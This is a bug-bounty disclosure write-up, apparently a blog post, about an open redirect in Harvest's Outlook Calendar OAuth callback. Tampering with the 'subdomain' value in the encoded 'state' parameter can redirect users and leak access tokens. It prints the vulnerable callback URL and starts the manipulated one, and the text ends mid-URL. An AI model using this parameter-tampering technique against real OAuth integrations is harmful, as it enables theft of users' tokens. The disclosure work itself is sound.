Reported an OAuth token leak via open redirect in Harvest.
- Posted on:
2023-10-21 22:33 - Reading Time: 4 min
-
Share on:
Table of Contents
Summary
Harvest is a time-tracking software that allows users to connect their Outlook Calendar through OAuth. After a successful grant of permission, the user is redirected to https://outlook-integration.harvestapp.com/auth/outlook-calendar/callback which further redirects the user to the URL provided within the state. This leads to an open redirect which can be used to steal access tokens through an implicit grant.
Proof of Concept
The bare open redirect which led to the token leak was found after a successful connection to Outlook calendar using OAuth application located at https://hackerone295.harvestapp.com/outlook-calendar/connect. The link was:
https://outlook-integration.harvestapp.com/auth/outlook-calendar/callback?state=%7b%22return_to%22:%22/%22%2c%22subdomain%22:%22hackerone295%22%7d
state parameter in the above URL is a JSON object URI encoded:
{"return_to":"/","subdomain":"hackerone295"}
The subdomain parameter is used to guess the main space of the Harvest app ie. hackerone295.harvestapp.com in the above case. Appending a forward slash to the subdomain parameter leads to open redirect:
https://outlook-integration.harvestapp.com/auth/outlo